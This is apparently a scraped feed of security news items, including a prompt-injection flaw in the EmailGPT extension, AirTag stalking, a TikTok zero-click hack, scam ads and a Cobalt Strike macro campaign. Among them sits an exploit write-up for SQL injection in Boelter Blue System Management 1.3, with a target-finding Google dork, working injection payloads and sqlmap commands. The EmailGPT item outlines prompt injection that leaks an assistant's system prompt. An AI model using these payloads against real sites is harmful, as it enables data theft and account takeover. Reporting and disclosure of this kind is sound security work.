Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email…

Synopsys warns of a new prompt injection hack involving a security vulnerability in EmailGPT, a popular AI email assistant. Learn how a security flaw in EmailGPT could allow hackers to steal your data or cause financial losses. Discover what you can do to protect yourself and why security is crucial in AI-powered tools.

A security vulnerability discovered by Synopsys’ Cybersecurity Research Center (CyRC) has exposed a potential pitfall for users of EmailGPT, a popular AI-powered email writing assistant and Google Chrome extension.

This vulnerability, tracked as CVE-2024-5184 and dubbed prompt injection, could allow malicious threat actors to manipulate the service and potentially compromise sensitive information.

****What is EmailGPT?****

EmailGPT leverages OpenAI’s GPT models to assist users in crafting emails within Gmail. Users can receive AI-generated suggestions for composing emails more efficiently by providing prompts and context. However, the recent discovery highlights a potential security flaw in this functionality.

****The Prompt Injection Threat****

EmailGPT uses an API service that allows a malicious user to inject a direct prompt and take over the service logic. Attackers can exploit this by forcing the AI service to leak standard system prompts or execute unwanted prompts.

When submitting a malicious prompt, the system provides the requested data, making it vulnerable to exploitation by anyone having access to the service. The vulnerability has a CVSS score of 6.5, indicating medium severity.

****Possible Dangers****

A malicious user could create a prompt that injects unintended functionality, potentially leading to data extraction, spam campaigns using compromised accounts, and generating misleading email content, contributing to disinformation campaigns. Apart from causing intellectual property leakage, this vulnerability can lead to denial-of-service, and financial loss when exploited. 

As per Synopsys’ blog post, researchers reached out to the developers of EmailGPT before publicizing the details, adhering to their responsible disclosure policy, but did not receive a response yet. Researchers recommend immediately removing EmailGPT from any installations as no workaround is currently available.

Users should stay informed about updates and patches to ensure continued secure use of the service. As AI technology continues to evolve, vigilance and robust security practices will be crucial to mitigate potential risks.

> _“The CyRC reached out to the developers but has not received a response within the 90-day timeline dictated by our responsible disclosure policy. The CyRC recommends removing the applications from networks immediately.”_
> 
> Synopsys

Patrick Harr, CEO at Pleasanton, Calif.- based SlashNext Email Security commented on the issue and emphasised the importance of strong governance and security measures for AI models to prevent vulnerabilities and exploits, stating that businesses should require proof of security from AI model suppliers before integrating them into their operations.

_“_This latest research by the Synopsys Cybersecurity Research Center further highlights the importance of strong governance on building, securing and red-teaming the AI models themselves. At its core, AI is code that can be exploited like any other code and the same processes need to be put in place to secure that code to prevent these unwanted prompt exploits,_“_ Patrik said. 

_“_Security and governance of the AI models are paramount as part of the culture and hygiene of companies building and proving the AI models either through applications or APIs. Customers particularly businesses need to demand proof of how the suppliers of these models are securing themselves including data access BEFORE they incorporate them into their business,_“_ he added.

****REALTED TOPICS** **

1.  New LLMjacking Attack Lets Hackers Hijack AI Models
2.  Flaws Exposed Hugging Face to AI Supply Chain Attacks
3.  AI Generated Fake Obituary Websites Target Grieving Users
4.  AI-Powered Scams, Human Trafficking Fuel Global Crime Surge
5.  ShadowRay Campaign Targets Ray AI Framework in Global Attack

New EmailGPT Flaw Puts User Data at Risk: Remove the Extension NOW

Boelter Blue System Management version 1.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)Google Dork: inurl:"Powered by Boelter Blue"Date: 2024-06-04Exploit Author: CBKB (DeadlyData, R4d1x)Vendor Homepage: https://www.boelterblue.comSoftware Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_USVersion: 1.3Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12CVE: CVE-2024-36840Vulnerability Details:Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.PoC:web server operating system: Linux Debian 9 (stretch)web application technology: Apache 2.4.25back-end DBMS: MySQL >= 5.0.12[22:21:39] [INFO] fetching database namesavailable databases [5]:[*] Anchor5Digital1. news_details.php?id parameter:Type: Boolean-based blindPayload: id=10071 AND 4036=4036Type: Time-based blindPayload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs2. services.php?section parameter:Type: Boolean-based blindPayload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))Type: Time-based blindPayload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs3. location_details.php?id parameter:Type: Boolean-based blindPayload: id=836 AND 4036=4036Type: Time-based blindPayload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbsImpact:Unauthorized access to the database.Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.Account takeovers and potential full control of the affected application.Discoverer(s)/Credits:CBKB (DeadlyData, R4d1x)References:https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

Boelter Blue System Management 1.3 SQL Injection

AI’s integration into search engines could change the way many of us interact with the internet.

Thursday, June 6, 2024 14:00

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue. 

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, when I tried searching for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?” 

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 

Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.  

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue, perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence. 

**The one big thing **

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victim’s networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”    

**Why do I care? **

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.  

**So now what? **

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.  

**Top security headlines of the week **

**Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider.** Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg) 

**International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever.** U.S. prosecutors announced last week that it dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic replay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security) 

**In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families.** Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #185: How much has AI helped bad actors who spread disinformation? 
*   DarkGate switches up its tactics with new payload, email templates 
*   New banking trojan “CarnavalHeist” targets Brazil with overlay attacks 
*   New Nork-ish cyberespionage outfit uncovered after three years 
*   LilacSquid APT Employs Open Source Tools, QuasarRAT 
*   NHS cyber attack causes cancellations as London hospitals hit by ‘major IT incident’ 

**Upcoming events where you can find Talos **

**_AREA41_** **_(June 6 – 7)_** 

_Zurich, Switzerland_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches._ 

**_Cisco Connect U.K._** **_(June 25)_**

_London, England_

> _In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe._

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201

The sliding doors of misinformation that come with AI-generated search results

A husband, now indicted, allegedly used seven Apple AirTags to stalk his ex-wife over a period of several weeks. His trial begins this month.

Following their divorce, a husband carried out a campaign of stalking and abuse against his ex-wife—referred to only as “S.K.”—by allegedly hiding seven separate Apple AirTags on or near her car, according to documents filed by US prosecutors for the Eastern District of Pennsylvania.

The documents, unearthed by 404 Media in collaboration with Court Watch, reveal how everyday consumer tools, like Bluetooth trackers, are sometimes leveraged for abuse against spouses and romantic partners.

 “The Defendant continued to adapt and use increasingly sophisticated efforts to hide the AirTags he placed on S.K.’s car,” US attorneys said. “It is clear from the timing of the placement of the AirTags and corroborating cell-site data, that he was monitoring S.K.’s movements.”

On May 8, the US government filed an indictment against the defendant, Ibodullo Muhiddinov Numanovich, with one alleged count of stalking against his ex-wife, S.K.

The stalking at the center of the government’s indictment allegedly began around March 27, when the FBI first learned about S.K. finding and removing an AirTag from her car. Less than a month later, on April 18, the FBI found a second AirTag that “was taped underneath the front bumper of S.K.’s vehicle with white duct tape.”

The very next day, the FBI found a third AirTag. This time, it was “wrapped in a blue medical mask and secured under the vehicle near the rear passenger side wheel well.”

This pattern of finding an AirTag, removing it, and then finding another was punctuated by physical and verbal intimidation, the government wrote. After a fourth AirTag was removed, the government said that Numanovich called S.K., followed her to a car wash, and “banged on her windows, and demanded to know why S.K. was not answering his calls.” Less than one week later, during a period of just 10 minutes, the government said that Numanovich left five threatening voice mails on S.K.’s phone, calling her “disgusting” and “worse than an animal.”

During the investigation, the FBI retrieved seven AirTags in total. Here is where those AirTags were found:

1.  Found by S.K. with no detail on specific location
2.  Duct-taped underneath the front bumper of S.K.’s car
3.  Underneath S.K.’s car, near the passenger-side wheel well, wrapped in a blue medical mask
4.  Within the frame of SK’s driver-side mirror, wedged between the mirror itself and the casing around it
5.  “An opening within the vehicle’s frame” which, documents say, was previously sealed by a rubber plug that was removed
6.  Underneath the license plate on S.K.’s car
7.  Undisclosed

For two of the retrieved AirTags, the FBI deactivated the trackers and then, away from S.K., placed the AirTags at separate locations. At an undisclosed location in Philadelphia where the FBI placed one AirTag, FBI agents later saw Numanovich “exit his vehicle with his phone in his hand, and begin searching for the AirTag.” At a convenience store where the FBI placed a second AirTag, agents said they again saw Numanovich.

The FBI also received information about attempted pairings and successful unpairings with Numanovich’s Apple account for three of the Apple AirTags.

In addition to the alleged pattern of stalking, the government also accused Numanovich of abusing SK both physically and emotionally, threatening her in person and over the phone, and recording sexually explicit videos of her to use as extortion. After a search warrant was authorized on May 13, agents found “approximately 140 sexually explicit photographs and videos of S.K.” stored on Numanovich’s phone, along with records for “numerous” financial accounts that transferred more than $4 million between 2022 and 2023.

In a follow-on request from the government to detain Numanovich before his trial begins, prosecutors also revealed that S.K. may have been brought into the US through a “Russian-based human smuggling network”—a network of which Numanovich might be a member.

According to 404 Media, a jury trial for Numanovich is scheduled to start on June 8.

**Improving AirTag safety**

Just last month, Apple and Google announced an industry specification for Bluetooth tracking devices such as AirTags to help alert users to unwanted tracking. The specification will make it possible to alert users across both iOS and Android if a device is unknowingly being used to track them. We applaud this development.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Husband stalked ex-wife with seven AirTags, indictment says 

Google has announced plans to store Maps Timeline data locally on users' devices instead of their Google account effective December 1, 2024.
The changes were originally announced by the tech giant in December 2023, alongside changes to the auto-delete control when enabling Location History by setting it to three months by default, down from the previous limit of 18 months.
Google Maps Timeline,

Google Maps Timeline Data to be Stored Locally on Your Device for Privacy

Eliot Higgins and his 28,000 forensic foot soldiers at Bellingcat have kept a miraculous nose for truth—and a sharp sense of its limits—in Gaza, Ukraine, and everywhere else atrocities hide online.

How to Lead an Army of Digital Sleuths in the Age of AI

TikTok accounts are being hacked! Celebrities and brands targeted in zero-click attack. Learn more about this major security…

TikTok accounts are being hacked! Celebrities and brands targeted in zero-click attack. Learn more about this major security breach in which accounts have been compromised.

Social media, online shopping and video giant TikTok has experienced a cyberattack in which attackers managed to compromise celebrity and brand accounts, including hotel heiress Paris Hilton, Sony, and CNN. 

While specific details about the nature of the attack are scarce at the moment, VXUnderground explained in its post on X (formerly Twitter) that an unknown threat actor discovered an exploit in TikTok that allows users to hijack accounts. The payload is delivered through TikTok direct messages and executed when read, without requiring external files or user response. 

The number of affected accounts is currently unclear but according to the latest update from TikTok, only two accounts have been compromised, one being CNN’s. 

The attack was first reported by Semafor and Forbes, according to which TikTok was targeted in a zero-click account takeover campaign that allows malware to compromise brand and celebrity accounts without direct interaction. Both the outlets confirmed that CNN temporarily removed its account after being hacked.  

A search for CNN returns no results for the US-based English language account

According to TikTok’s spokesperson, Alex Haurek, the number of compromised accounts is “very small,” but refused to explain how TikTok is protecting other exposed accounts.

“We are dedicated to maintaining the integrity of the platform and will continue to monitor for any further inauthentic activity,” Haurek said, specifically referring to CNN’s account compromise. TikTok is working with the news outlet to restore account access and implement enhanced security measures to safeguard their TikTok account.

TikTok’s privacy and security team spokesperson, Jason Grosse, stated that the company is still investigating the attack and cannot comment on its scale or sophistication, but mentioned that the threat is a “potential exploit.”

For your information, Hilton’s staff and sources at TikTok have confirmed that her account was targeted but not compromised.

Hanna Basha, Partner at Payne Hicks Beach, one of the oldest and known law firms in the United Kingdom, commented on the incident highlighting the threat luring behind data sharing on social media.

_“_TikTok is the latest of many companies to be subject to a cyberattack highlighting that it is now almost impossible to avoid these sorts of attacks and therefore incredibly important that individuals consider carefully what they are sharing on social media platforms,_“_ warned Hanna.

_“_Individuals sharing private messages have legal rights in privacy, confidence and data to keep these messages private and prevent them from being published. However, the practical advice must be to try to limit what you do share, even in direct messages, and before sending consider whether it could be damaging or embarrassing if published,” Hanna emphasised.

ByteDance-owned TikTok, with over one billion users globally, has reportedly taken measures to prevent future attacks and is working with affected account owners to restore access if needed.

TikTok has long been criticized for its security practices, particularly when in January 2021 Check Point Research identified a flaw that could have allowed attackers to build a database of TikTok users and in September 2022, Microsoft discovered a one-click exploit affecting the Android app, allowing attackers to take over accounts. It is about time the company strengthens its cybersecurity mechanisms to prevent similar incidents.

1.  TikTok vulnerability allowed hackers to send SMS with malware
2.  TikTok Invisible Body Challenge Trend Abused to Drop Malware
3.  TikTokers promoted adware, earned half a million dollars in profit
4.  TikTok collected MAC addresses for Android against Google’s ToS
5.  New smishing scam spreads fake TikTok App loaded with malware

Few But High-Profile TikTok Accounts Hacked Via Zero-Click Attack in DM

A WIRED investigation, based on more than 22 million flight coordinates, reveals the complicated truth about the first full-blown police drone program in the US—and why your city could be next.

The Age of the Drone Police Is Here

These scammers are persistent and want your billing information to extort money from you.

Back in February, we reported on malicious ads related to utility bills (electricity, gas) that direct victims to call centers where scammers will collect their identity and try to extort money from them.

A few months later, we checked and were able to find as many Google ads as before, following very much the same pattern. In addition, we can see that miscreants are trying to legitimize their operations by creating fake U.S.-based entities.

**Utility-based ads targeting mobile phones**

It only took us 15 minutes to find about a dozen fraudulent ads on Google related to utility bills. This campaign is targeting mobile devices only, as far as we can tell, and U.S. residents. All the ads seen below belong to different advertisers based in Pakistan.

Some of those advertiser accounts have a fairly large footprint with several hundred ads.

Most often, the ad is not associated with a landing page (although a URL is displayed); instead clicking on the ad will bring up the phone number and prompt you to dial. Having said that, the domains used belong to the scammers and are often fairly new.

We also saw several ads that at first appear somewhat legitimate. They are registered to advertisers based in the US and their websites look almost authentic. But when you start checking the details, you realize some things don’t add up, such as an address that leads to an apartment complex.

**Consumer protection**

The Federal Trade Commission (FTC) has an article about utility scams, however the technique mentioned there is about scammers calling victims, rather than the other way around. For good reason many people won’t answer the phone when it shows an unknown number as it is likely yet another telemarketer. Certainly, there are victims that will answer the phone but the scam is much more effective when you are the one to initiate the call.

We have reported the fraudulent advertiser accounts to Google while we are also adding related domains to our blocklist. Remember to be extremely vigilant before calling anyone, especially if that number came from an advertisement. If in doubt, go directly to your utility company’s website using a computer and then look for a form or phone number that you can verify before dialing.

 Utility scams update 

Beware Macro! Ukrainian users and cyberinfrastructure are being hit by a new malware campaign in which hackers are…

Beware Macro! Ukrainian users and cyberinfrastructure are being hit by a new malware campaign in which hackers are using a multi-stage malware strategy to deliver the Cobalt Strike.

A recent cyberattack targeting Microsoft Windows-based endpoints in Ukrainian has been discovered by Fortinet’s FortiGuard Labs where attackers leverage a malicious Excel file to deploy Cobalt Strike, a notorious tool used for post-exploitation activities. 

In this attack, an apparently harmless Excel file is embedded with a VBA (Visual Basic for Applications) macro, a scripting language used in Microsoft Office applications. The attacker uses a multi-stage malware strategy to deliver the “Cobalt Strike” payload and establish communication with a command and control server.

The malicious Excel document contains Ukrainian elements to lure users into enabling its macros. The macro deploys a HEX-encoded DLL downloader, which executes the DLL (Dynamic Link Library) file using a shell command.

The DLL file, also disguised as a harmless component, is the key to deploying Cobalt Strike. The downloader examines process names for specific strings related to analysis tools and antivirus software, terminates the program if it detects a matching process, and executes the decoded file using “rundll32.exe”.

As per FortiGuard Labs’s report, The DLL Injector, “ResetEngine.dll,” is responsible for decrypting and injecting the final payload. It uses “NtDelayExecution” to evade detection of malicious activities within sandboxes and then, it decrypts the final payload using an AES algorithm. The code then injects the decrypted data into itself and uses various APIs to execute the final Cobalt Strike.

For your information, Cobalt Strike is a powerful tool that allows attackers to gain a foothold within a compromised system, steal sensitive data, deploy additional malware, and establish network persistence.

Fortinet researchers discovered a geolocation check within the VBA code, ensuring the payload is only downloaded on systems located in Ukraine. This targeted approach indicates a well-orchestrated operation with a specific goal in mind.

Attack flow (FortiGuard Labs)

This isn’t the first time a malicious Excel file was used to target Ukraine in recent years due to the ongoing geopolitical situation. In 2022, FortiGuard Labs reported a campaign using a malicious Excel document to deliver a Cobalt Strike loader, while Ukraine’s Computer Emergency Response Team confirmed UAC-0057’s involvement in an attack using a malicious XLS file to deploy PicassoLoader and Cobalt Strike Beacon.

This recent attack further highlights the evolving tactics of cybercriminals and the importance of robust cybersecurity measures. Users should be cautious of enabling macros in Excel files, especially from unknown sources and use reliable endpoint security software that can detect and prevent malicious macros.

1.  RomCom RAT Targets Pro-Ukraine Guests at NATO Summit
2.  UAC-0099 Used Old WinRAR Flaw in New Attack on Ukraine
3.  Google, Microsoft and Oracle generated most vulnerabilities
4.  AcidRain Linux Malware Variant “AcidPour” Targeting Ukraine
5.  Microsoft Office Most Exploited Software in Malware Attacks

Tag

#google